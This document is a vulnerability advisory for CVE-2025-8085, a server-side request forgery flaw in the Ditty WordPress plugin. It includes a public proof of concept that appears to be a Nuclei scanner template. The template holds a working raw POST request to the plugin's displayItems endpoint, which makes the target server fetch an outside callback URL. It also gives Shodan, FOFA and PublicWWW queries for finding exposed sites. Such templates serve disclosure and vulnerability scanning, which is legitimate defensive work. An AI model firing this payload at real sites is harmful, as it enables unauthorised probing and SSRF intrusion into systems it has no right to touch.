CVE-2025-8085: Ditty < 3.1.58 - Server-Side Request Forgery

Date: 2025-08-01 | Affected software: Ditty | PoC: public

Vulnerability description

The plugin lacks authorization and authentication for requests to its displayItems endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs. v3.1.57 attempted to fix the issue with a nonce check; however, any authenticated user, such as a subscriber, can retrieve the nonce.

PoC code [public]

id: CVE-2025-8085

info:
  name: Ditty < 3.1.58 - Server-Side Request Forgery
  author: s4e-io
  severity: high
  description: |
    The plugin lacks authorization and authentication for requests to its displayItems endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs. v3.1.57 attempted to fix the issue with a nonce check; however, any authenticated user, such as a subscriber, can retrieve the nonce.
  reference:
    - https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8085
    - https://research.cleantalk.org/cve-2025-8085/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"/wp-content/plugins/ditty-news-ticker/"
    fofa-query: body="/wp-content/plugins/ditty-news-ticker/"
    publicwww-query: "/wp-content/plugins/ditty-news-ticker/"
  tags: cve,cve2025,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,metaphorcreations

variables:
  marker_string: "{{rand_text_alpha(5)}}"
  marker_int: "{{rand_int(1000, 9999)}}"

http:
  - raw:
      - |
        POST /wp-json/dittyeditor/v1/displayItems HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "apiData": {
            "layouts": [
              {
                "id": "{{marker_string}}",
                "html": "{image default_src=\"http://{{interactsh-url}}\"}",
                "css": "{{marker_string}}"
              }
            ],
            "items": [
              {
                "item_id": "{{marker_int}}",
                "item_type": "default",
                "item_value": { "content": "{{marker_string}}" },
                "layout_value": { "default": "{{marker_string}}" }
              }
            ]
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'contains_all(body, "{{marker_string}}", "{{marker_int}}")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100bf756c18ab457c1ec3a7866390cb49bb081549afc1a5da06eacb66b09569874a022100deefb16a6976008fc53f55878bafe9109524e83ee3fc81ff17d076859536cf05:922c64590222798bb761d5b6d8e72950
